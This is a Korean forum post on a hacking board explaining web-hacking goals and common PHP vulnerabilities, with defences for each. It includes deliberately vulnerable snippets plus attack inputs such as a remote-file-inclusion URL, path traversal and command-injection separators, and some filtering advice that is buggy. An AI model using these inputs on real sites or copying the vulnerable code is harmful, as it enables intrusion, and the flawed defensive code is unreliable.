Skip Navigation

XE 레이아웃 카메론 XE LAYOUT CAMERON XE1.9.9


HACKING

기본문서
2015.07.21 05:28

웹해킹의 목적

profile 단축주소복사하기
(*.185.23.170) 조회 수 170 추천 수 0 댓글 0
?

단축키

Prev이전 문서

Next다음 문서

크게 작게 위로 아래로 댓글로 가기 인쇄
?

단축키

Prev이전 문서

Next다음 문서

크게 작게 위로 아래로 댓글로 가기 인쇄
Extra Form
원문주소
1. 웹해킹의 목적.

웹해킹의 목적으로는 역시나 최종적으로는 해당 서버의 root 획득일것입니다.

하지만 웹해킹만을 이용해서 root 를 획득한다는것은 거의 불가능할 것입니다.

대표적인 목적으로는 remote access 의 권한을 얻어내는것에 목적을 둘수 있습니다.

현재 수많은 웹서버가 인터넷에 돌아가고 있으며, 그 웹서버중에서 아주 많은 수의 서버들은

취약한 웹프로그래밍에 의해서 구동되고 있습니다. 이 취약점을 통해서 우리는

해당서버의 불법적인 remote access 를 할수 있게됩니다. 현재의 웹 해킹이라면 역시나

root 를 얻게 되는 local 의 초석이 된다고 생각합니다.

그럼 이제부터 웹을 통해서 어떻게 우리가 접속 권한을 얻는지 살펴보겠습니다.



2. 웹해킹의 대표적인 방법.

웹해킹의 대표적인 방법들을 크게 분류하여서 알아보겠습니다. 이외의 방법이 존재할지도 모릅니다.

대부분의 방법을 이곳에서 다룰것입니다.

1) get,post 를 이용한 방법.

웹은 우리가 흔히 볼수 있는 desktop app 처럼 변수를 text 영역에 저장해서 가지고 오는 방식은

취할수 없습니다. 그 이유는 기본적인 html 기반으로 설계되었기 때문입니다. 변수를 전달하는

방법은 크게 4가지로 나뉩니다.

	1. session 

	2. cookie

	3. java script(get 방식과 거의 동일합니다.)

	4. get,post

여기서 우리는 get, post 에 의한 방법을 알아보겠습니다.

get 방식은 페이지 이동시에 변수를 넘기지만 그 변수의 값이 url 에 나타나는 경우를 말합니다.

http://prosager.hackerschool.org/test.html?value=prosager

위와 같은 방식으로 value 라는 이름의 변수에 값 prosager 이 저장되어서 test.html 이라는

페이지에 넘겨주는 방식입니다.

post 방식은 같은 방법이 아닌 html form tag 를 사용하여 action 페이지에 우리가 넣어준 값을

전달하는 방식입니다. url 에 나타나지는 않지만 이것역시 변수를 전달한다는 점에는 변함이

없습니다. 그럼 이제부터 이 변수를 이용해서 어떻게 해킹이 가능한지 살펴보겠습니다.

post, get 방식은 거의 차이가 없는 관계로 get 방식으로 보기 편하게 설명을 하겠습니다.
(물론 약간의 차이가 있지만, 해커에게 이 정도의 차이는 없는것과 같다고 생각합니다.)

** APM 환경이라고 가정하고 모든 예제를 진행합니다. **

//test.html
<?
	$query = "Select * from DB_NAME where id=$value";
	$result = mysql_query($query,$dbconn);
	while($row = mysql_fetch_array($result)) {
		echo ("$row[INFO]");
	}
?>

위의 예제는 단순하게 select 를 통해서 DB 에서 자료를 가지고 오는 구조입니다.

하지만 id=$value 의 부분을 보시면 알겠지만, id 를 url 에 직접적으로 넣어줄수 있습니다.

즉 id=prosager 가 아닌 id=admin 과 같이 우리가 url 에 직접 direct 로 접속하게 되면,

admin 의 정보가 출력되게 됩니다.

위와 같은 방법을 막기 위해서는 get,post 방식으로 입력받을 때 언제나 체크해 주는 방법이

최선의 방법입니다. 즉 

	if($id="admin") {
	DiewithError("Fatal error!!");
	}
위와 같이 admin 을 필터링하거나 혹은

	$id = $HTTP_SESSION_VARS[id];

와 같이 변수의 재할당을 하여서 변조되더라도, 다시 복구 시키는 루틴을 입력해 줄수 있습니다.

또는 get, post 방식 자체를 페이지에서 봉인할수 있습니다. 하지만 get 이면 get, post 면 post

단 하나의 방법만을 쓸수 있게 하는것입니다. 둘다 못쓰게 되면 변수 전달 자체가 되지 않으니깐요

위와 같은 방법을 통해서 get, post 의 방법을 막을수 있습니다.

Get,post 방법의 취약점 방어법.
	(1). 변수에 대한 필터링을 해준다.(ex, eregi함수)
	(2). 변수를 페이지 내에서 재할당하여 준다.(ex. $id=$HTTP_SESSION_VARS[id];)
	(3). 변수에 대해서 세심한 체크를 해준다.(ex. if($id=!$check) )
	(4). post, get 방식을 쓰지 못하게 만든다.(ex. $REQUEST_METHOD==post);

위와 같은 방법으로 post, get 방식의 방어를 할수 있게 됩니다.


2) 사용자 입력을 이용한 방법.

사용자의 입력을 이용한 방법이라는 거창한 타이틀이지만 실제로는 모두가 알고 있는 부분입니다.

게시판에 글을 작성할 경우, 대부분 제목, 이름, 내용, 비밀번호와 같은 부분을 채워넣게 됩니다.

하지만 여기서 파일을 올릴수 있는 게시판의 경우에 우리가 목표로 하여서 전개해 나가겠습니다.

file upload 의 경우에는 많은 취약점이 존재했습니다.


-1- file upload 시에 php 코딩되는 파일을 언제나 필터링 해줘야합니다. 

httpd.conf 에 보면 php 로 코딩되는 파일이 있는데요, 가끔씩 .ph, .inc, .p 같이

이런 파일들이 코딩되는것이 보이는데요, 바로 필터링 해주셔야하겠습니다.

$check=explode( ".", $in_file_name); 

if($check[1]!="txt") 
{ 
echo "Error!!"; 
exit; 
} 

위와 같은 경우에서 test.txt.php 라고 올리게 되면, 필터링이 가능합니다~ 이럴땐

@ 를 사용하여서 필터해 주어야합니다.

다른 방법으로 필터링하는 방법으로는..

if(eregi("php", $in_file_name)) 
{
echo "Error";
exit;
}

위와 같은 방법으로 파일의 확장자를 체크하는 방법이 있으나 저것은 php.txt 라는 것도 필터하게 됩니다.

즉 php 라는 단어가 들어가 있으면 그냥 필터링하는것이지요.




-2- 업로드시에 post 방식으로 올라오거나 get 방식인데요,

약간의 변조를 위해서 혹은 스푸핑이나, 특정한 문자열을 삽입함으로서

단순히 DB 를 망치자는 생각이 가능합니다. 이런것들을 막기 위해서

if(!eregi($HTTP_HOST,$HTTP_REFERER)) { }

와 같은 코드를 사용해서 사용자의 입력을 받더라도 최대한 걸러서 받는게 좋습니다.


-3- 업로드시에 ../, *, ? , # 와 같은 특수문자를 필터링해주는것이 좋습니다.

../../../../ 와 같은 방식으로 한다면, 하위 디렉토리까지 접근이 가능합니다.

위와 같은 것을 막아주면 좋구요, 다른 특수문자역시 막아두는것이 좋습니다.

if(eregi("\.\.", $in_file))
 {
  echo "Error";
  exit;
 }

위와 같이 파일을 필터링하는것이 좋습니다.


-4-

html tag 중에서 <xmp> 라는 태그가 있습니다.

이 태그는 소스를 보여주게 되는 역화을 합니다. 

뭐 현재는 거의다 필터링 되지만 자신이 개발한 보드에서 필터링이 안될경우가 있습니다.

<Script> 태그 역시 마찬가지 입니다. 주의해서 사용하시는게 좋겠죠?


3) Cookie, session 변조.

페이지간 변수 전달방법으로서 cookie, session 을 사용하는 경우가 많습니다.

이런 경우에 예전부터 많이 거론 되었던 cookie spoofing 혹은 session spoofing 혹은

xss 같은 취약점이 존재할수 있습니다. xss 는 예전에 제가 썼던 문서를 참고 하시길 바랍니다.

cookie 같은 경우, 예전에 보안이라는 말이 거의 없었던 회사에서 잠시 알바했던 경험으로 보면,

Setcookie(~~~~~~) 이런식으로 인코딩도 하지 않고서, 브라우저에서 보지 못한다는 생각으로

프로그램을 짰었는데요, 이런것은 단순하게 telnet 80 으로 접속해서 cookie:auth=1000

과 같은 방식으로 인해서 스푸핑이 됩니다. 여기서 진보된 것이 xss 겠죠~

지금도 cookie 를 스푸핑해서 할수 있는 일들이 있다고 생각이 되네요, 잘 찾아본다면 말이겟죠? ^^;

쿠키에 관해서는 javascript:document.cookie 로 확인하십시요~

쿠키문제는 beist.org 혹은 coun 에 좋은 문제가 있으니 풀어보시길 바랍니다~

session 은 가장 많이 사용하는 인증의 수단이고, 많은 사이트에서도 사용중입니다.

세션 스푸핑은 몽이님이 쓰신 글이 있으니 그것을 참고 하시면 다들 아실겁니다~

혹은 apache 권한을 얻으신후에, /tmp 폴더에서 자신의 sess_[sessid] 와 같은 방식의
(기본 폴더가 /tmp 입니다, 수정가능.)

파일을 수정하게 됨으로서 스푸핑이 가능하겠습니다.


	(1) 쿠키 사용시에 암호화할것이며, 쿠키를 전적으로 신뢰하지 않는다.
	(2) 특히 사용자 관리시에는 session 을 사용하길 권장합니다.
	(3) session 역시나 주의해서 사용하시길 바랍니다.

4) 프로그래머의 실수에 의한 방법.

웹 프로그래머로서의 실수는 어디서나 발견되는 법입니다. 

작은 실수로 인해서 더욱더 많은 권한을 부여해 주는 일이 생기게 됩니다.

이러한 가능한 상황을 알아보겠습니다.

-1- 

admin 을 위한 페이지에서 if($auth_admin) 과 같은 방식으로 인증을 하는경우에는

임의의 값이 있기만 한다면 admin 페이지를 보여주게 됩니다.

이런 인증을 사용하지 마시고, $auth_admin=='wiseguys' 와 같은 방식으로 물론 crypt 해야겠죠.

같은 방식으로 비교하시는게 좋습니다.

-2-

system() 함수의 남발의 예를 들수 있습니다.

system("echo '$var' >> log.log");

위와 같은 방법으로 system 함수를 남발하는경우에는 ; | 와 같은 방법을 통해서

local access 의 권한을 얻을수 있게 됩니다.

system 함수를 사용하기 보다는 다른 함수를 사용하거나, 최대한 시스템 함수의 사용을

자제하는것이 좋을것입니다.


-3-

fopen() 함수 사용시 주의점.

fopen 함수는 파일을 열어주는 함수입니다. 하지만 fopen("$filename","r"); 과 같은 방법으로

사용하지만 filename 을 쓸때 ../../ 와 같은 것이 불가능하게 만들어 줘야합니다.

그렇게 않으면, 상위 디렉의 파일을 읽을수 있게 되며, 제로보드의 config.txt 와 같은 파일을 

읽게 되면 DB 접속의 권한을 얻을수 있게 됩니다. 또한 DB 비번과 telnet 비번을 같이 쓰는 경우가

아주 많은데, 이런경우에는 합당한 방법으로 서버에 access 가 가능하게 됩니다.

반드시 사용자 입력을 받는경우에는 재할당 혹은 필터링을 해주는것을 권장합니다.


-4-

파일 업로드 알고리즘에 대해서는 beist 님이 아주 상세하게 잘 적어 놓아서

제가 별다르게 제시할 경우는 없습니다. 하지만 업로드 라는것 자체가 서버에 파일을 올리는것이니

당연히 취약점이 생길가능성이 높아집니다. 이런경우에는 필터링만이 살길입니다.

최대한 많은 필터링을 통해서 불법적인 접근을 막아줘야겠습니다.

eregi, strcmp 의 친구가 되시길..



5) 서버 관리자의 실수에 의한 방법.

서버 관리자의 실수에 의한 방법에 대해서 말해보겠습니다.

많은 서버의 관리자들이 관리자따로 프로그래머 따로인 경우가 많습니다.

그래서 상호 의사소통이 잘 되지 않은 경우에는 이런 문제가 생길경우가 있습니다.

-1-

httpd.conf 의 취약 가능성.

httpd.conf 에는 php 로 코딩되는 확장자에 대한 설정이 되어 있습니다.

AddType application/x-httpd-php     .html .php .php3 .php4 .inc .htm .ph .p

와 같이 php 코딩되는 파일명이 inc, ph ,p 와 같이 쓸모없는 것들이 들어가 있는 경우에는

프로그래머가 필터링한 파일 업로드 알고리즘에서 당연히 다 체크해 줘야합니다.

하지만 이렇게 체크하지 않는 경우에는 심각한 문제가 될수도 있습니다. 좋은 방법은

언제나 conf 파일을 확인하고, 필터링을 해줘야하겠습니다.

-2-

backup 에 의한 취약 가능성.

대부분의 서버 관리자는 백업을 아주 중요한 목표로 생각하고 있습니다.

또한 백업을 하는 과에서 취약점이 들어날수도 있습니다.

Login.php 를 백업시에 Login.bak 와 같은 방식으로 폴더 역시 /back 혹은 /backup 폴더에

파일을 백업시키는 경우가 있습니다. 이런경우에는 bak 파일의 형식이 txt 이니, php 소스가 그대로

공개됩니다. 만약에 DB 접속의 문장이 Login.php 에 있는 경우라면 역시나 DB 접속이 가능한

권한을 얻게 되는것이지요, 백업시에는 언제나 이런 문제가 없도록 백업을 하시고 바로 파일을 지우는

습관을 하시는게 좋겠습니다.


-3- 

디렉토리 권한에 관한 취약점. 

리눅스 서버에서의 디렉토리의 권한은 아주 중요합니다.

제로보드 설치시에 원하는 권한은 707 입니다. 하지만 실제로 이렇게 줘버리면 약간의 문제가 발생합니다.

php 는 r 권한없이 x 권한만으로도 잘 돌아갑니다.(몇가지 함수 제외)

그렇기 때문에 디렉토리 자체에 r 권한이 걸려 있는 경우에는 어떠한 구조를 가지고 있으며, 어떠한

파일들이 저장되어 있는지 모두 공개되게 됩니다. 해킹역시나 정보전입니다. 정보가 많게 되면, 당연히

해킹의 가능성이 늘어나게 되는것입니다. 이런 상황을 최대한 피해주시길 바랍니다.

언제나 설정을 잘해주시는것만이 살길입니다.



3. 현대적인 웹해킹 법.

제목은 현대적인 웹해킹이지만, 실제로는 현재 쓰이고 있는 웹 해킹방법이나, 가능성이 있는것들

혹은 이미 알려진 것들에 대한 것들을 다루겠습니다. 재밌게 봐주세요~

1) zero board.

제로 보드는 현재 가장 많이 쓰이고 있는 보드라고 생각이 됩니다. 적수보드 혹은 미니 보드와 더불어서

많이 쓰이는 보드라고 생각이 되는것입니다. 이 제로보드의 취약점을 알아보겠습니다.

-1- 

include '$dir/lib.php' 

위와 같은 취약점은 php 파일에서 include 를 하는 경우에 발생하는 취약점입니다.

$dir 변수를 바꾸어서 include 시키게 되면 include 된 lib.php 파일의 실행이 가능해 집니다.

$dir=http://hackerschool.org/lib.php 와 같은 방식으로 코드 삽입을 통해서 

remote access 의 권한 획득역시 가능하게 됩니다.

방어방법으로서는 $dir 의 변수를 체크해 주는 방법이 있습니다.


-2- 

image_box.php 에 관련된 버그가 있으나, 이것은 몽이님이 아주 상세히 적어 놓았으므로

제가 다시 적지는 않겠습니다.

이런 버그는 제로보드 내에서 image_box 라는게 존재하는지도 저는 몰랐었습니다.

즉 쓰지 않는 기능에 대해서는 무지하지만, 이 쓰지 않는 기능이 취약한 것이지요,

보통 이런경우의 취약점은 발견되기가 쉽지 않지만, 기본적으로 package 에 딸려서 오는 기능이므로

대부분은 단순히 간과하는 경향이 있습니다. 이런 작은 버그가 큰 문제를 일으킬수 있게 됩니다.

필터링하는 방법은 몽이님이 쓰신 글을 참조하시길 바랍니다.



2) 웹서버 자체 취약점.

이 취약점에 대해서는 별로 대단히 할말은 없는 부분입니다. 예전에만해도 기본적으로 제공되는

/cgi-bin 의 폴더에 많은 취약점이 가능한 파일들이 존재했었는데, 지금은 대부분 이것들을 많이

막아두었다, 하지만 지금의 문제점은 역시나 서버 어플리케이션 자체의 문제일 가능성이 높다.

가장 대표적인 예로는 apache-openssl 의 취약점을 들수 있다, 대부분의 서버들이 apache 서버를 돌리고

그리고 보안접속을 위해서 openssl 을 설치했었는데, 이 경우에 remote access 의 권한을 부여하는

exploit 이 공개 되면서 큰 파장을 일으켰었다. 이런 상황에서의 대처법혹은 대응법으로서는

언제나 서버의 취약점이 있는지 검사해야하며, 메일링 리스트에 가입해서 최신의 보안정보를

얻는것이 필요하다. 또한 새로운 버전으로 update 하는것을 권장한다.


유명한 다른 서버자체의 취약점으로는 samba 를 들수 있겠다. remote root 획득이 가능한

이 취약점에 대해서는 이미 많이 알려져 있다. 역시나 최신버전으로 유지하는 방법만이

가장 효율적인 방법이다.


4. 결론.

웹해킹의 방법은 다양하게 많은 방법이 존재하는것이 아닙니다. 아주 몇가지의 경우가 있지만,

이 경우를 통해서 자신의 권한을 획득해 나가는것이 웹을 통해서 가능합니다.

이 문서를 통해서 알아두어야할점은, 프로그램을 잘짜자!, 서버 설정을 잘하자!, 서버 관리를 잘하자!

뭐 이렇게 단순한 말들입니다. 말로 하면 단순하지만 실제로 단순하지 않을겁니다.

해쿨같이 대형 사이트의 코드만 체크하는데 몇일이 걸릴지는 아무도 모른다는것이지요, 하지만 실제로

코딩을 시작할때부터 보안을 염두에 두고 코딩을 한다면, 많이 취약점이 줄어들수도 있습니다.

언제나 보안에 신경을 곤두세우고 있으며, 많은 관심을 가지는 방법만이 보안의 왕도라고 생각이 됩니다.

웹은 어쩔수 없는 선택입니다. 우리가 쓰고 있는 많은 웹, 검색, E-biz 많은 서비스들이

사라질거라고 생각은 들지 않습니다. 


그런 의미에서 웹 프로그래밍과 보안에 많은 관심을 기울여 주셨으면 합니다~

결론? 그런거 낼 필요가 없을지도..^^
같은 태그를 가진 연관된 글
  1. HACKING 웹 해킹 종류2 (218)
  2. HACKING 웹해킹툴 (191)
TAG •

Who's 부운영자

profile

<빌립보서 4장 10절-13절> "내가 주 안에서 크게 기뻐함은 너희가 나를 생각하던 것이 이제 다시 싹이 남이니 너희가 또한 이를 위하여 생각은 하였으나 기회가 없었느니라 내가 궁핍하므로 말하는 것이 아니라 어떠한 형편에든지 내가 자족하기를 배웠노니 내가 비천에 처할 줄도 알고 풍부에 처할 줄도 알아 모든 일에 배부르며 배고픔과 풍부와 궁핍에도 일체의 비결을 배웠노라  내게 능력 주시는 자 안에서 내가 모든 것을 할 수 있느니라 "


List of Articles
번호 분류 제목 글쓴이 날짜 조회 수
공지 기본문서 해킹에 대한 정리 프레지문서 부운영자 2013.08.28 1091
38 1.정보수집 정보수집 단계 요약 3.1호스트 확인 과정 3.1.1. dns 정보수집 3.1.1.1 dnsdict6 : ipv6 정보 확인 3.1.1.2 dnsmap : DNS 정보 수집 3.1.1.3 dnsrecon : 차별화된 DNS 정보수집 3.1.1... 부운영자 2018.09.09 27
37 설치 [인스톨]칼리리눅스 설치(인스톨)하기 :) 부운영자 2018.09.09 20
36 1.정보수집 How to use Zenmap (Kali Linux) 부운영자 2018.09.09 17
35 1.정보수집 How To - Kali Linux 2.0 - Dmitry Information Gathering Tool 부운영자 2018.09.09 25
34 설치 칼리리눅스 2018.3 한글 패치 Kali 기본적인 설정 (패키지 관리, 한글 입력) - Kali 설치 시, 패키지 관리를 위한 저장소(Repository)가 정상적으로 지정되지 않아서 생기는 문제를 해결하는 ... 부운영자 2018.09.09 90
33 기본문서 메타스플로잇을 이용한 exploit (feat.아미티지) 메타스플로잇을 이용한 exploit (feat.아미티지) 부운영자 2017.05.15 395
32 기본문서 칼리리눅스 툴 정리 http://tools.kali.org/tools-listing 칼리 리눅스 툴에 대한 정리가 잘되어 있습니다. 부운영자 2017.05.15 1190
31 기본문서 칼리리눅스 한글 설정 http://cholchori.tistory.com/1634 칼리 리눅스 한글 설정 자세한 설명이 되어 있음... 칼리리눅스 업데이트 # apt-get update &amp;&amp; apt-get upgrade &amp;&amp; apt-get d... 부운영자 2017.05.15 233
30 1.정보수집 How to use ike scan in kali linux to scan ike hosts - ike-scan tutorial file 부운영자 2016.08.26 236
29 1.정보수집 How To Use Dnmap Tool In Kali Linux | Dnmap Client | Dnmap Server 부운영자 2016.08.26 155
28 1.정보수집 How to gather information on sites with kali linux and dmitry file 부운영자 2016.08.26 152
27 해킹툴 백트랙 3장 4장 2부 NSE 부운영자 2015.07.29 108
26 해킹툴 백트랙 3장 4장 1부 부운영자 2015.07.29 262
25 기본문서 웹 해킹 기본 Hacking은 대략 세가지 정도로 나눌 수 있다. 시스템 해킹 네트워크 해킹 웹 해킹 =-&gt; 웹 애플리케이션을 통해서 발생되는 해킹 웹 해킹을 성공하게 되면 해커들... 부운영자 2015.07.21 355
24 기본문서 웹 해킹 종류2 공개 웹 어플리케이션의 위험성 =-&gt;직접 설치해보고 구성을 알 수 있음 세션 관리 취약점 인증 및 세션은 인증이 필요한 페이지를 의미하며, 취약점이 발생하는 ... 부운영자 2015.07.21 218
23 기본문서 웹 해킹 종류1 정보수집 구글링(=구글해킹) 기본정보(ip, port) =-&gt; nslookup, nmap 응용 프로그램 종류 및 버전 운영체제 종류 및 버전 웹 스캔 웹 구조 분석(수작업) =-&gt; 실력... 부운영자 2015.07.21 539
22 기본문서 웹 퍼징 (Web Fuzzing) 도구 소개 및 활용 방법 실무에서의 침투 테스트는 대부분은 제한적인 정보하에 진행되는 경우가 많다. 물론 프로젝트의 성격에 따라 침투 팀에게 주어지는 정보의 양과 범위는 제각각이... file 부운영자 2015.07.21 598
21 기본문서 모의해킹을 연습할 수 있는 환경을 제공하는 사이트 모의해킹을 연습할 수 있는 환경을 제공하는 사이트 침투테스트 가상환경을 샌드박스 형태로 제공하여, 온라인상에서 모의해킹을 해볼수 있는 사이트 https://hac... 부운영자 2015.07.21 669
20 기본문서 PHP웹 보안 취약점 Top5 국제 웹 보안 표준 기구(OWASP – Open Web Application Security Project)에서 해마다 자주 발생하는 #웹보안취약점 Top 10 을 선정하여 발표 합니다. 이것을 기... 부운영자 2015.07.21 208
» 기본문서 웹해킹의 목적 1. 웹해킹의 목적. 웹해킹의 목적으로는 역시나 최종적으로는 해당 서버의 root 획득일것입니다. 하지만 웹해킹만을 이용해서 root 를 획득한다는것은 거의 불가... 부운영자 2015.07.21 170
목록
Board Pagination Prev 1 ... 2 Next
/ 2

사이트연락처

  • 이용약관
    개인정보 취급방침
  • 070-7797-4480
  • 디스코드/스카이프ID : [admin@4880.net]
    카카오플러스 / 카카오플러스채팅
    Loading the player ...
서버에 요청 중입니다. 잠시만 기다려 주십시오...